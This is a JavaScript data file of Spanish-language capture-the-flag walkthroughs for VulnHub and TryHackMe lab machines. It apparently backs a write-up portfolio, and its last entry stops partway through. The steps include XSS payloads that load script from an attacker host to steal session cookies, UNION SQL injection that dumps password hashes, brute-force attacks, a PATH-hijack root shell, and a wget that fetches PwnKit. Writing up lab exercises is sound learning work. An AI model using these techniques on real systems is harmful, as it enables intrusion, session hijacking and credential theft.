window.ast4Writeups = {
  "ica-1": {
    "titulo": "ICA: 1",
    "plataforma": "VulnHub",
    "dificultad": "Fácil",
    "foco": [
      "MySQL",
      "SSH",
      "SUID"
    ],
    "resumen": "Resolución completa con conexión, reconocimiento, explotación y escalada paso por paso.",
    "texto": "ICA: 1\nConexion\n1.- Leemos en la descripcion :\n2.- Ponemos el comando \nsudo arp-scan -I eth0 192.168.18.0/24 --ignoredups\nDonde vemos que la IP de la maquina victima es  “ 192.168.18.19 “\n3.- Vemos que tenemos una conexión con la maquina con el comando :\nping -c 192.168.18.19\nReconocimiento\n1. - Ponemos el comando :\nnmap --open --min-rate=5000 -T5 -sV -sC -p- 192.168.18.19\nDonde nos muestra los puertos abiertos :\n80 ,version  (Apache httpd 2.4.48 ) \n22, SSH ( Open 8.4p1 )\n3306 ( Mysql 8.0.26 )\nExplotacion\n1.- Vemos la interfaz web\n2.- Hacemos un Fuzzing y encontramos varios directorios interesante\n3.- Entramos en el directorio uploads pero no encontramos nada relevante\n4.- Vemos el directorio Template\n5.- Vemos algunas credenciales pero son falsos positivos , por que no ayudan\n6.- Entonces seguimos buscando y encontramos unas credenciales de una base de datos mysql\n7.-  Entonces para aprovechar las credenciales de la base de datos expuesta ponemos el comando : \nmysql -h <IP> -u <Usuario> -p <contraseña> --ssl=FALSE \n8.-  Donde al entrar investigamos vas sobre la informacion que guarda esta base de datos expuesta \n9.-  Vemos las tablas mediante el comando : \nSHOW TABLES;\nPero no encontramos nada relevante en esta base de datos \n5.- Entonces lo que haremos sera ingresar a otra base de datos mediante el comando : \nuse staff;\nluego entraremos a ver los directorios mediante el comando :\nSELECT * FROM user;\nDespues veremos las credenciales mediante el comando : \nSELECT * FROM login;\n7.- Aprovecharemos las credenciales y crearemos dos archivos , donde lo dividiremos en usuarios y contraseñas\n8.- Aprovecharemos y haremos un ataque de fuerza bruta con ella donde obtenemos credenciales\nEscala de privilegios\n1.- Una vez entramos encontramos como una nota en el escritorio pero no dice nada relevante\n2.- Entonces lo que haremos sera ver los permisos SETUID \n3.-  donde veremos el archivo get_access , y vemos que llama al binario “ cat “\n, pero no lo llama de la manera correcto entonces lo que haremos sera crear un  “ cat “ falso  \n4.-  pondremos un echo '/bin/bash -p'  > cat   donde queremos que ejecute el programa  cat falso\nDespues le daremos permisos de ejecucion poniendo : chmod +x cat\nModificaremos el PATH , mediante export PATH=/tmp:$PATH\nEjecutaremos el binario vulnerable",
    "imagenes": [
      "assets/notion-writeups/ica-1/captura-01.png",
      "assets/notion-writeups/ica-1/captura-02.png",
      "assets/notion-writeups/ica-1/captura-03.png",
      "assets/notion-writeups/ica-1/captura-04.png",
      "assets/notion-writeups/ica-1/captura-05.png",
      "assets/notion-writeups/ica-1/captura-06.png",
      "assets/notion-writeups/ica-1/captura-07.png",
      "assets/notion-writeups/ica-1/captura-08.png",
      "assets/notion-writeups/ica-1/captura-09.png",
      "assets/notion-writeups/ica-1/captura-10.png",
      "assets/notion-writeups/ica-1/captura-11.png",
      "assets/notion-writeups/ica-1/captura-12.png",
      "assets/notion-writeups/ica-1/captura-13.png",
      "assets/notion-writeups/ica-1/captura-14.png",
      "assets/notion-writeups/ica-1/captura-15.png",
      "assets/notion-writeups/ica-1/captura-16.png",
      "assets/notion-writeups/ica-1/captura-17.png",
      "assets/notion-writeups/ica-1/captura-18.png",
      "assets/notion-writeups/ica-1/captura-19.png",
      "assets/notion-writeups/ica-1/captura-20.png"
    ]
  },
  "myexpense": {
    "titulo": "MyExpense: 1",
    "plataforma": "VulnHub",
    "dificultad": "Medio",
    "foco": [
      "XSS",
      "CSRF",
      "SQLi"
    ],
    "resumen": "Cadena web completa con sesión, CSRF, SQL injection y varias fases de explotación documentadas.",
    "texto": "MyExpense: 1\nConexion\n1.- Leemos en la descripcion :\nTenemos unas credenciales : \nusuario —— >  samuel\ncontraseña —— > fzghn4lw\n2.- Ponemos el comando \nsudo arp-scan -I eth0 192.168.1.0/24 --ignoredups\nDonde vemos que la IP de la maquina victima es  “ 192.168.1.96 “\n3.- Vemos que tenemos una conexión con la maquina con el comando :\nping -c 192.168.1.96\nReconocimiento\n1. - Ponemos el comando :\nnmap --open --min-rate=5000 -T5 -sV -sC -p- 192.168.1.96\nDonde nos muestra los puertos abiertos :\n80 ,version  (Apache httpd 2.4.29 ) \n38007,version (Mongoose httpd)\n57729,version (Mongoose httpd)\n59325,version (Mongoose httpd)\nExplotacion 1\n1.- Ingresamos a la pagina de Victima y obtenemos varias rutas\n2.- Para ingresar a la web corporativa, mediante un usuario y contraseña\n3-. Para registrarnos a la web corporativa\n4.- hacemos Fuzzing en la pagina y encontramos varias rutas interesantes , donde el mas relevante es “ admin “\n5.- Entonces hacemos Fuzzing a la pagina de admin , con este comando :\nwfuzz -c --hc=404,403 --hh=2219 -t 200 -w /usr/share/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt -z list,php-txt-html http://192.168.1.95/admin/FUZZ.FUZ2Z\nEncontramos una ruta interesante que es “ /admin.php ”\n6.- Ingresamos a la pagina /admin/admin.php\nViendo que tenemos un panel administrativo interno, donde sus caracteristicas son :\nEl usuario Samuel esta —- > deshabilitado\nTenemos Información sobre el Usuario administrador\n7.- Pasamos a habilitar al usuario Samuel y nos dice de que no podemos habilitarlo porque no estamos autorizados\n8.- Intentamos ingresar al usuario Samuel —- con name de : slamotte \nDonde nos dice “ Su cuenta ha sido bloqueada o está inactiva.  ”\n9.- Entonces lo que vamos hacer es crearnos una cuenta aleatoria , donde veremos \nsi es vulnerable al XSS poniendo el script : <script>alert('hola')</script>\ny vemos que no podemos dale  ENTER \n10.- Entonces ingresamos para inspeccionar la web, y borramos disabled=\"” , donde ya se estaria habilitando el boton ENTER ,procediendo a registrarnos\n11.- Actualizamos el panel administrativo interno y vemos que si es vulnerable al XSS\n12.- Viendo esto lo que podemos intentar hacer es robar la cookie de session entonces nos registramos con este comando :\n<script src=\"http://192.168.1.93/cooki.js\"></script>\n13.- Ponemos el puerto 80 en escucha y creamos el archivo JS\n14.- Entonces al darle ENTER, nosotros vemos sin acceder al panel administrativo si alguien lo esta revisando para robarnos su cookie\n15.- Obteniendo ya su Cookie lo que nosotros vamos hacer es cambiar nuestra cookie por la nueva Cookie obtenida \nExplotacion 2\n1.- Al recargar y entrar a la pagina nos dice : \n“ Lo sentimos, como administrador solo puedes autenticarte una vez a la vez. ”\nLo que podemos concluir que hemos robado la cookie de sesion de administrador\nPor otro lado no podemos ingresar al panel administrativo dos veces a la vez\n2.- Entonces lo que nosotros haremos sera hacer un CSRF (engañar al navegador del usuario para que haga una acción que él no pidió, pero que el servidor acepta como válida ) \n3.- Ingresamos al panel administrativo  y ponemos en habilitar en el usuario Samuel\n4.- copiamos la URL\n“ http://192.168.1.96/admin/admin.php?id=11&status=active “\nDonde la URL realiza una acción, que cambia el estado de un usuario a “active”.\n5.- Modificamos el Script y ponemos en escucha, donde se verifica que hemos recibido una solicitud GET\n6.- Recargamos la pagina y vemos que el Usuario Samuel esta habilitado\n7.- Ponemos las credenciales y ingresamos a web corporativa\n8.- Nos dirigimos a Expense report, le damos en aceptar y nos sale que el \n\" ¡El informe de gastos se ha enviado correctamente! \"\nLo que quiere decir que nos tienen que aceptar la solicitud\n9.- Vamos a nuestra cuenta y vemos que nuestro manager es “ Manon Riviere “ \n10.- Perfecto entonces lo que debemos es ingresar en la sesion de \" Manon Riviere “ y aceptar la solicitud que hemos enviado ,entonces investigamos y nos dirigimos a la pagina principal donde observamos que tenemos un chat y varios usuarios y entre ellos es “ Manon Riviere “ \n11.- Para ello vamos a crear un script , pero en este caso en el puerto 5000, para que no haya confunsion con el otro script que estamos ejecutando\n12.-  Abrimos un puerto 5000 en escucha y ponemos en la web este comando : \n<script src=\"http://192.168.1.93:5000/oño.js\"></script>\n13.- Vemos nuestra puerto en escucha y vemos que tenemos muchas cookies de sesion entonces lo que haremos es probar una de ellas y ver que nos la sesion de \n“ Manon Riviere “\n14.- Al poner la Cookie de Sesion de “ 60dkldn7u8fsokj9s0712k3pa5 “  y recargar la pagina obtenemos la sesion de “ Manon Riviere “\n15.- Entramos en reportes y aceptamos la solicitud \nExplotacion 3\n1.- Ahora lo que debemos hacer es que el usuario  “ Paul Baudouin “ , nos acepte la solicitud\n2.- Sin embargo no obtenemos la cookie de sesion del usuario “ Paul Baudouin “ , es por que nos iremos a “ Rennes “ , y aplicamos INJECTION SQL\n3.- Lo que haremos primero sera por algo comun ‘ or 1=1-- - \nViendo que no nos interpreta \n4.- Pero si podemos  or 1=1-- -  , si nos interpreta donde deducimos que podemos injectar nuestro comandos sin comillas \n5.- Entonces nosotros debemos saber cuantas columnas tiene esta base de datos, para ello ponemos order by x-- -  , donde nos acepta order by 1-- - hasta\norder by 4-- -  , deduciendo que tenemos 4 columnas\n6.- Nos comviene trabajar con  order by 2-- -  , para ello vamos a trabajar con \n  union select NULL,NULL-- - pero en ves de NULL , ponemos numeros y vemos que columna nos interpreta, donde vemos que la columna “ 2 “ , puede interpretarnos\n7.- Ponemos el comando :\nunion select 1,schema_name from information_schema.schemata-- -\nPara ver todas las bases de datos del sistema\n8.-  Ponemos el comando :\nunion select 1,table_name from information_schema.tables where table_schema='myexpense'-- -\nPara que nos muestra la tabla de la base de datos “ myexpense “\n9.- Ponemos el comando : \nunion select 1,column_name from information_schema.columns where table_schema='myexpense' and table_name='user'-- -\nDonde nos mostrara las columnas de la tabla “ User “\n10.- Donde vemos dos columnas “ username “ y “ password “ donde ponemos el comando :\nunion select 1,group_concat(username,':',password) from user-- -\nDonde nos muestra el usuario y contraseña ( encriptada )\nafoulon:124922b5d61dd31177ec83719ef8110a\npbaudouin:64202ddd5fdea4cc5c2f856efef36e1a\nrlefrancois:ef0dafa5f531b54bf1f09592df1cd110\nmriviere:d0eeb03c6cc5f98a3ca293c1cbf073fc\nmnguyen:f7111a83d50584e3f91d85c3db71070\npgervais:2ba907839d9b2d94be46aa27cec150e5\nplacombe:04d1634c2bfffa62386da699bb79f191\ntriou:6c26031f0e0859a5716a27d2902585c7\nbroy:b2d2e1b2e6f4e3d5fe0ae80898f5db27\nbrenaud:2204079caddd265cedb20d661e35ddc9\nslamotte:21989af1d818ad73741dfdbef642b28f\nnthomas:a085d095e552db5d0ea9c455b4e99a30\nvhoffmann:ba79ca77fe7b216c3e32b37824a20ef3\nrmasson:ebfc0985501fee33b9ff2f2734011882\nArian:a5bb6f7a52ecb73940ea0cce6aee5731\ncookie:538d8614340a769da7ef34a8d2e0938a\n11.- Para ello lo que nos interesa sera el usuario “  pbaudouin “ Entonces su contraseña encriptada lo pondremos en CrackStation - Online Password Hash Cracking - MD5, SHA1, Li…​\nDonde nos da que la contraseña es : HackMe\n12.- Entonces ingresamos con las credenciales y aceptamos el pago de Samuel\n13.- Por ultimo al ingresar al usuario Samuel , vemos que el pago se hizo exitosamente y nos da la The flag is : flag{H4CKY0URL1F3}",
    "imagenes": [
      "assets/notion-writeups/myexpense/captura-01.png",
      "assets/notion-writeups/myexpense/captura-02.png",
      "assets/notion-writeups/myexpense/captura-03.png",
      "assets/notion-writeups/myexpense/captura-04.png",
      "assets/notion-writeups/myexpense/captura-05.png",
      "assets/notion-writeups/myexpense/captura-06.png",
      "assets/notion-writeups/myexpense/captura-07.png",
      "assets/notion-writeups/myexpense/captura-08.png",
      "assets/notion-writeups/myexpense/captura-09.png",
      "assets/notion-writeups/myexpense/captura-10.png",
      "assets/notion-writeups/myexpense/captura-11.png",
      "assets/notion-writeups/myexpense/captura-12.png",
      "assets/notion-writeups/myexpense/captura-13.png",
      "assets/notion-writeups/myexpense/captura-14.png",
      "assets/notion-writeups/myexpense/captura-15.png",
      "assets/notion-writeups/myexpense/captura-16.png",
      "assets/notion-writeups/myexpense/captura-17.png",
      "assets/notion-writeups/myexpense/captura-18.png",
      "assets/notion-writeups/myexpense/captura-19.png",
      "assets/notion-writeups/myexpense/captura-20.png",
      "assets/notion-writeups/myexpense/captura-21.png",
      "assets/notion-writeups/myexpense/captura-22.png",
      "assets/notion-writeups/myexpense/captura-23.png",
      "assets/notion-writeups/myexpense/captura-24.png",
      "assets/notion-writeups/myexpense/captura-25.png",
      "assets/notion-writeups/myexpense/captura-26.png",
      "assets/notion-writeups/myexpense/captura-27.png",
      "assets/notion-writeups/myexpense/captura-28.png",
      "assets/notion-writeups/myexpense/captura-29.png",
      "assets/notion-writeups/myexpense/captura-30.png",
      "assets/notion-writeups/myexpense/captura-31.png",
      "assets/notion-writeups/myexpense/captura-32.png",
      "assets/notion-writeups/myexpense/captura-33.png",
      "assets/notion-writeups/myexpense/captura-34.png",
      "assets/notion-writeups/myexpense/captura-35.png",
      "assets/notion-writeups/myexpense/captura-36.png",
      "assets/notion-writeups/myexpense/captura-37.png",
      "assets/notion-writeups/myexpense/captura-38.png",
      "assets/notion-writeups/myexpense/captura-39.png",
      "assets/notion-writeups/myexpense/captura-40.png",
      "assets/notion-writeups/myexpense/captura-41.png",
      "assets/notion-writeups/myexpense/captura-42.png",
      "assets/notion-writeups/myexpense/captura-43.png",
      "assets/notion-writeups/myexpense/captura-44.png",
      "assets/notion-writeups/myexpense/captura-45.png",
      "assets/notion-writeups/myexpense/captura-46.png",
      "assets/notion-writeups/myexpense/captura-47.png",
      "assets/notion-writeups/myexpense/captura-48.png",
      "assets/notion-writeups/myexpense/captura-49.png",
      "assets/notion-writeups/myexpense/captura-50.png",
      "assets/notion-writeups/myexpense/captura-51.png",
      "assets/notion-writeups/myexpense/captura-52.png",
      "assets/notion-writeups/myexpense/captura-53.png",
      "assets/notion-writeups/myexpense/captura-54.png",
      "assets/notion-writeups/myexpense/captura-55.png",
      "assets/notion-writeups/myexpense/captura-56.png",
      "assets/notion-writeups/myexpense/captura-57.png",
      "assets/notion-writeups/myexpense/captura-58.png"
    ]
  },
  "blog": {
    "titulo": "Blog",
    "plataforma": "TryHackMe",
    "dificultad": "Fácil",
    "foco": [
      "WordPress",
      "WPScan",
      "SUID"
    ],
    "resumen": "Enumeración de WordPress, credenciales, explotación con Metasploit y escalada mediante checker.",
    "texto": "Blog\nConexion\n1.- Prendemos la VPN , que nos dio nuestra cuenta de TRYHACME\n2.- Prendemos la maquina ,donde nos da una IP ——— > 10.64.173.129\n3.- Ponemos el comando : sudo nano /etc/hosts \nEn nuestra maquina y agregamos :\nLa IP   = 10.64.173.129\nEl dominio  = blog.thm\n4.-  Hacemos el comando ping -c 1 10.64.173.129 \nDonde nos da la conexion exitosa \nReconocimiento\n1. - Ponemos el comando :\nnmap --open --min-rate=5000 -T5 -sV -sC -Pn -p- 10.64.173.129\nDonde nos muestra los puertos abiertos :\n22 ,version (OpenSSH 7.6p1 )\n80 ,version  (Apache 2.4.29 ) \n139 y 445\nExplotacion\n1.- Ingresando a la interfaz nos encontramos con esta interfaz de titulo\n“ Billy Joel’s IT Blog “\n2.- Utilizamos la herramienta whatweb , donde nos ayudara a encontrar el CMS , que estamos utilizando que es “ Wordpress “ y tambien la version “ 5.0 “\n3.- Utilizamos el comando wpscan --url http://blog.thm/ \nDonde encontramos : \n/wp-admin/\nxmlrpc.php habilitado  ( Permite: Fuerza bruta vía XML-RPC )\nreadme.html accesible\nwp-content/uploads/\n3.- Ahora pondremos el comando wpscan --url http://blog.thm -e u  \nDonde va enumerar usuarios  y encontramos los usuarios :\nbjoel ( Usuarios válido )\nkwheel ( Usuarios válido )\nKaren Wheeler  ( display name )\nBilly Joel  ( display name )\n4.- Nos intentamos conectar por SMB, pero no encontramos nada relevante\n5.- Ponemos el comando : \nwpscan --url http://blog.thm/ --passwords rockyou.txt --usernames kwheel\nDonde nos va dar la contraseña del usuario “ Kwheel ” que es “ cutiepie1 “\n6.- Investigamos la version de Wordpress 5.0 y vemos que es vulnerable con mestasploit \n7.- Entonces lo que haremos sera aprovecharnos de la credenciales que encontramos y  ingresaremos mediante metasploit con el comando\nmsfdb run\nuse exploit/multi/http/wp_crop_rce\n7.-  Colocamos los datos :\n8.- Donde le daremos en “ run “ y vemos que nos ingreso nuestro Payload con exito\n9.- Le pondremos “ shell ” + “ script /dev/null -c bash “  \nPara tener una interfaz interactiva\n10.- Ahora vamos a la carpeta /home/bjoel y luego descargamos el archivo PDF , \nen la pagina  /var/www/wordpress/wp-content/uploads/  ya que podemos ver los archivos descargados \n11.- Vemos el documento y concluimos :\nUSB / dispositivo extraíble / pendrive\nPosiblemente el archivo user.txt , esta en media/usb\n12.- Buscamos los binarios con el comando :\nfind / -perm -4000 2>/dev/null\nEntre la lista apareció: /usr/sbin/checker\n13.- Ejectumos : \n/usr/sbin/checker\nPero nos sale : “ Not an Admin “ ,esto indica algún control interno, posiblemente basado en permisos o variables de entorno.\n14.- Revisamos con el comando :  strings /usr/sbin/checker\n Esto da pistas claras: \nEl binario chequea si eres admin (getenv(\"admin\"))\nEl binario chequea si eres admin (getenv(\"admin\"))\n15.- Probamos con la  variable de entorno, poniendo el comando :\nexport admin=1\n/usr/sbin/checker\nObteniendo acceso de root",
    "imagenes": [
      "assets/notion-writeups/blog/captura-01.png",
      "assets/notion-writeups/blog/captura-02.png",
      "assets/notion-writeups/blog/captura-03.png",
      "assets/notion-writeups/blog/captura-04.png",
      "assets/notion-writeups/blog/captura-05.png",
      "assets/notion-writeups/blog/captura-06.png",
      "assets/notion-writeups/blog/captura-07.png",
      "assets/notion-writeups/blog/captura-08.png",
      "assets/notion-writeups/blog/captura-09.png",
      "assets/notion-writeups/blog/captura-10.png",
      "assets/notion-writeups/blog/captura-11.png",
      "assets/notion-writeups/blog/captura-12.png",
      "assets/notion-writeups/blog/captura-13.png",
      "assets/notion-writeups/blog/captura-14.png",
      "assets/notion-writeups/blog/captura-15.png",
      "assets/notion-writeups/blog/captura-16.png",
      "assets/notion-writeups/blog/captura-17.png",
      "assets/notion-writeups/blog/captura-18.png",
      "assets/notion-writeups/blog/captura-19.png",
      "assets/notion-writeups/blog/captura-20.png",
      "assets/notion-writeups/blog/captura-21.png",
      "assets/notion-writeups/blog/captura-22.png",
      "assets/notion-writeups/blog/captura-23.png",
      "assets/notion-writeups/blog/captura-24.png",
      "assets/notion-writeups/blog/captura-25.png",
      "assets/notion-writeups/blog/captura-26.png",
      "assets/notion-writeups/blog/captura-27.png",
      "assets/notion-writeups/blog/captura-28.png",
      "assets/notion-writeups/blog/captura-29.png"
    ]
  },
  "easy-peasy": {
    "titulo": "Easy Peasy",
    "plataforma": "TryHackMe",
    "dificultad": "Fácil",
    "foco": [
      "Fuzzing",
      "Hash",
      "Stego"
    ],
    "resumen": "Resolución con puertos web, fuzzing, hashes, esteganografía, SSH y escalada de privilegios.",
    "texto": "Easy Peasy\nConexion \n1.- Prendemos la VPN , que nos dio nuestra cuenta de TRYHACME\n2.- Prendemos la maquina ,donde nos da una IP ——— > 10.66.184.5\n3.- Ponemos el comando : sudo nano /etc/hosts \nEn nuestra maquina y agregamos :\nLa IP   = 10.66.184.5\nEl dominio  = Easy-Peasy.thm\n4.-  Hacemos el comando ping -c 1 10.66.184.5 \nDonde nos da la conexion exitosa \nReconocimiento\n1. - Ponemos el comando :\nnmap --open --min-rate=5000 -T5 -sV -sC -Pn -p- 10.66.184.5\nDonde nos muestra los puertos abiertos :\n80 ,version ( HTTPnginx 1.16.1 )\n6498 ,version  ( OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 ) \n65524 ,version ( Apache httpd 2.4.43 )\nExplotacion 1\n1.- Vemos las interfaces de las dos paginas WEB :\nPuerto 80\nPuerto 65524\n2.- Haciendo un Fuzzing a la primera pagina WEB encontramos un directorio “hidden“\n3.- Haciendo un Fuzzing a la primera pagina WEB  con extensiones encontramos un directorio “robots-txt“\n4.- Al ingresar al directorio “robots.txt” no hemos encontrado nada relevante\n5.- Al ingresar al directorio “hidden” encontramos una imagen interesante\n6.- Entonces seguimos Fuzzeando el directorio “hidden” y encontramos un directorio mas llamado “whatever”\n7.- Ingresamos al directorio “whatever” y vemos una interefaz relevante\n8.- Ingresamos a la URL y vemos el codigo fuente donde tiene un cifrado \n “ ZmxhZ3tmMXJzN19mbDRnfQ== ”, posiblemente base 64\n9.- Encontrando efectivamente la primera FLAG  \n10.- Al Fuzzear la segunda pagina WEB , nos encontro el directorio “Robots.txt\n11.- Ingresando a la pagina “robots.txt” encontramos un cifrado interesante posiblemente sea un hash el cifrado que es : \na18672860d0510e5ab6699730763b250\n12.- Donde iremos a la pagina \nDecrypt MD5, SHA1, MySQL, NTLM, SHA256, MD5 Email, SHA256 Em…​\nDonde nos encuentra la segunda flag\n13.- Al investigar la pagina principal , con el puerto 65524 , encontramos la tercera flag\n14.- Al investigar la pagina principal , con el puerto 65524 , encontramos : \n “ its encoded with ba....:ObsJmP173N2X6dOrAgEAL0Vu ”\n15.- Investigamos en la pagina Dcode el cifrado : \nObsJmP173N2X6dOrAgEAL0Vu\nDonde vemos diferentes opciones\nExplotacion 2\n1.- Recordamos que nos dice bas……  \nEntonces escoguemos la primera base62\nDonde obtenemos con exitoso la codificacion oculta\n2.- Donde vemos que es un directorio del puerto 65524\n3.- Al ingresar en el codigo fuente vemos un posible Hash :\n940d71e8655ac41efb5f8ab850668505b86dd64186a66e57d1483e7f5fe6fd81\n4.- Creamos un archivo con el Hash\n5.- Hacemos un ataque de John :\njohn --format=gost --wordlist=easypeasy_1596838725703.txt gost.hash\nDonde encontramos la contraseña : mypasswordforthatjob\n6.- Investigamos en el directorio /n0th1ng3ls3m4tt3r  del puerto 65524 \n7.- Descargamos la imagen \n8.- Al hacer utilizar “stegseek” y utilizar el diccionario que nos dio la pagina , encontramos un archivo interesante : \nbinarycodepixabay.jpg.out\n9.- Al abrirlo obtenemos :\nUsuario : boring\nContraseña : 01101001 01100011 01101111 01101110 01110110 01100101 01110010 01110100 01100101 01100100 01101101 01111001 01110000 01100001 01110011 01110011 01110111 01101111 01110010 01100100 01110100 01101111 01100010 01101001 01101110 01100001 01110010 01111001\n10.- Donde al decifrarlo obtenemos : \niconvertedmypasswordtobinary\nDeduciendo que es esto es la contraseña de un usuario SSH\n11.- Obteniendo con exito el acceso a la maquina SSH\nEscala de privlegios\n1.- Ponemos el comando : \nfind / -perm -4000 2>/dev/null \nDonde nos muestras archivos con permisos STUID\n2.- Donde vemos un binario interesante llamado /usr/bin/pkexec  \nDonde investigamos y encontramos muchas vulnerabilidades\n3.- Entonces lo que haremos sera descargarnos en nuestra maquina y abrir un puerto con python \n4.- Descargamos el archivo de nuestra maquina en la maquina victima con el comando :  wget http://192.168.167.97:8000/PwnKit \nLe damos permisos\nEjecutamos \nDonde nos da root",
    "imagenes": [
      "assets/notion-writeups/easy-peasy/captura-01.png",
      "assets/notion-writeups/easy-peasy/captura-02.png",
      "assets/notion-writeups/easy-peasy/captura-03.png",
      "assets/notion-writeups/easy-peasy/captura-04.png",
      "assets/notion-writeups/easy-peasy/captura-05.png",
      "assets/notion-writeups/easy-peasy/captura-06.png",
      "assets/notion-writeups/easy-peasy/captura-07.png",
      "assets/notion-writeups/easy-peasy/captura-08.png",
      "assets/notion-writeups/easy-peasy/captura-09.png",
      "assets/notion-writeups/easy-peasy/captura-10.png",
      "assets/notion-writeups/easy-peasy/captura-11.png",
      "assets/notion-writeups/easy-peasy/captura-12.png",
      "assets/notion-writeups/easy-peasy/captura-13.png",
      "assets/notion-writeups/easy-peasy/captura-14.png",
      "assets/notion-writeups/easy-peasy/captura-15.png",
      "assets/notion-writeups/easy-peasy/captura-16.png",
      "assets/notion-writeups/easy-peasy/captura-17.png",
      "assets/notion-writeups/easy-peasy/captura-18.png",
      "assets/notion-writeups/easy-peasy/captura-19.png",
      "assets/notion-writeups/easy-peasy/captura-20.png",
      "assets/notion-writeups/easy-peasy/captura-21.png",
      "assets/notion-writeups/easy-peasy/captura-22.png",
      "assets/notion-writeups/easy-peasy/captura-23.png",
      "assets/notion-writeups/easy-peasy/captura-24.png",
      "assets/notion-writeups/easy-peasy/captura-25.png",
      "assets/notion-writeups/easy-peasy/captura-26.png",
      "assets/notion-writeups/easy-peasy/captura-27.png",
      "assets/notion-writeups/easy-peasy/captura-28.png",
      "assets/notion-writeups/easy-peasy/captura-29.png",
      "assets/notion-writeups/easy-peasy/captura-30.png",
      "assets/notion-writeups/easy-peasy/captura-31.png",
      "assets/notion-writeups/easy-peasy/captura-32.png",
      "assets/notion-writeups/easy-peasy/captura-33.png",
      "assets/notion-writeups/easy-peasy/captura-34.png",
      "assets/notion-writeups/easy-peasy/captura-35.png",
      "assets/notion-writeups/easy-peasy/captura-36.png",
      "assets/notion-writeups/easy-peasy/captura-37.png",
      "assets/notion-writeups/easy-peasy/captura-38.png",
      "assets/notion-writeups/easy-peasy/captura-39.png",
      "assets/notion-writeups/easy-peasy/captura-40.png",
      "assets/notion-writeups/easy-peasy/captura-41.png",
      "assets/notion-writeups/easy-peasy/captura-42.png",
      "assets/notion-writeups/easy-peasy/captura-43.png",
      "assets/notion-writeups/easy-peasy/captura-44.png",
      "assets/notion-writeups/easy-peasy/captura-45.png",
      "assets/notion-writeups/easy-peasy/captura-46.png"
    ]
  },
  "source": {
    "titulo": "Source",
    "plataforma": "TryHackMe",
    "dificultad": "Fácil",
    "foco": [
      "MiniServ",
      "Webmin",
      "Metasploit"
    ],
    "resumen": "Fingerprinting de MiniServ/Webmin y explotación con Metasploit paso por paso.",
    "texto": "Source\nConexion \n1.- Prendemos la VPN , que nos dio nuestra cuenta de TRYHACME\n2.- Prendemos la maquina ,donde nos da una IP ——— > 10.67.154.106\n3.- Ponemos el comando : sudo nano /etc/hosts \nEn nuestra maquina y agregamos :\nLa IP   = 10.67.154.106\nEl dominio  = source.thm\n4.-  Hacemos el comando ping -c 1 10.67.154.106 \nDonde nos da la conexion exitosa \nReconocimiento\n1. - Ponemos el comando :\nnmap --open --min-rate=5000 -T5 -sV -sC -Pn -p- 10.67.154.106\nDonde nos muestra los puertos abiertos :\n22 ,version  ( OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 ) \n10000 ,version (  httpd Miniserv 1.890 )\nExplotacion\n1.- Al abrir  la pagina web podemos ver una interfaz interesante \n2.-  Utilizamos whatweb y vemos la version HTTP que es MiniServ 1.890 , que parece tener muchas vulnerabilidades\n3.- Investigamos en internet y vemos que si  presenta muchas vulnerabilidades\n4.- Utilizamos el comando searchsploit y vemos tambien que hay vulnerabilidades\n5.- Entonces lo que haremos sera ingresar a Metasploit y ejecutar el codigo \n6.- Configuramos el codigo tomando en consideracion la IP de la maquina victima y nuestra IP\n7.- Le damos en “ run “ , y obtenemos acceso a root",
    "imagenes": [
      "assets/notion-writeups/source/captura-01.png",
      "assets/notion-writeups/source/captura-02.png",
      "assets/notion-writeups/source/captura-03.png",
      "assets/notion-writeups/source/captura-04.png",
      "assets/notion-writeups/source/captura-05.png",
      "assets/notion-writeups/source/captura-06.png",
      "assets/notion-writeups/source/captura-07.png",
      "assets/notion-writeups/source/captura-08.png",
      "assets/notion-writeups/source/captura-09.png",
      "assets/notion-writeups/source/captura-10.png",
      "assets/notion-writeups/source/captura-11.png",
      "assets/notion-writeups/source/captura-12.png",
      "assets/notion-writeups/source/captura-13.png"
    ]
  },
  "basic-pentesting": {
    "titulo": "Basic Pentesting",
    "plataforma": "TryHackMe",
    "dificultad": "Fácil",
    "foco": [
      "SMB",
      "Hydra",
      "SSH"
    ],
    "resumen": "Enumeración web y SMB, usuarios, fuerza bruta controlada y acceso por llave privada.",
    "texto": "Basic Pentesting\nConexion \n1.- Prendemos la VPN , que nos dio nuestra cuenta de TRYHACME\n2.- Prendemos la maquina ,donde nos da una IP ——— > 10.67.179.206\n3.- Ponemos el comando : sudo nano /etc/hosts \nEn nuestra maquina y agregamos :\nLa IP   = 10.67.179.206\nEl dominio  = Basic.thm\n4.-  Hacemos el comando ping -c 1 10.67.179.206 \nDonde nos da la conexion exitosa \nReconocimiento\n1. - Ponemos el comando :\nnmap --open --min-rate=5000 -T5 -sV -sC -Pn -p- 10.67.179.206\nDonde nos muestra los puertos abiertos :\n22 SSH \n80 HTTP (Apache 2.4.41) \n139 / 445 SMB (Samba) \nExplotacion\n1.- Entramos a la pagina web y no vemos nada interesante \n2.-  Fuzzeamos y encontramos un directorio interesante llamado “ development “ \n3.- Al encontrar el directorio encontramos estos archivos\n4.- Donde nos muestra estos contenidos deduciendo : \nIdentificación de Usuarios : K y J\nMencionan que están usando Struts versión 2.5.12 (Posible Vulnerabilidades ) \n5.- Investigamos mas al fondo y vemos el protoco SMB , donde vemos que tiene el usuario Anonymous , donde al ingresar vemos un archivo donde lo descargaremos\n6.- Al ver el archivo deducimos :\nUsuarios : Jan y Kay\nVulnerabilidad humana ( El mensaje de Kay (\"¡Eso va por ti también, Jan!\") sugiere fuertemente que Jan es descuidado o comete errores de seguridad frecuentes )\n7.- Entonces lo que haremos va ser un ataque con Hydra donde encontramos la contraseña Jan —— > armando\n8.-  Ingresando por SSH, al usuario JAN\nEscala de privlegios\n1.- El \"Despiste\" de Kay\nRecuerda que en staff.txt decía que Jan cometía muchos errores, pero que Kay era quien mandaba\nExploraremos el hogar de Kay: Ejecutamos ls -la /home/kay. Busca si hay una carpeta llamada .ssh.\nVemos que existe el directorio “ .ssh “ \n2.- Revisamos la llave SSH de Kay y vemos un archivo llamado id_rsa  ,ese archivo es la llave privada de Kay\n3.- Copiamos esa llave en nuestra maquina \n4.- Intentamos acceder pero nos pide contraseña \n5.- Donde haremos un ataque de contraseña con John , obteniendo la contraseña :   “ beeswax “\n6.- Obteniendo acceso , a la maquina Kay",
    "imagenes": [
      "assets/notion-writeups/basic-pentesting/captura-01.png",
      "assets/notion-writeups/basic-pentesting/captura-02.png",
      "assets/notion-writeups/basic-pentesting/captura-03.png",
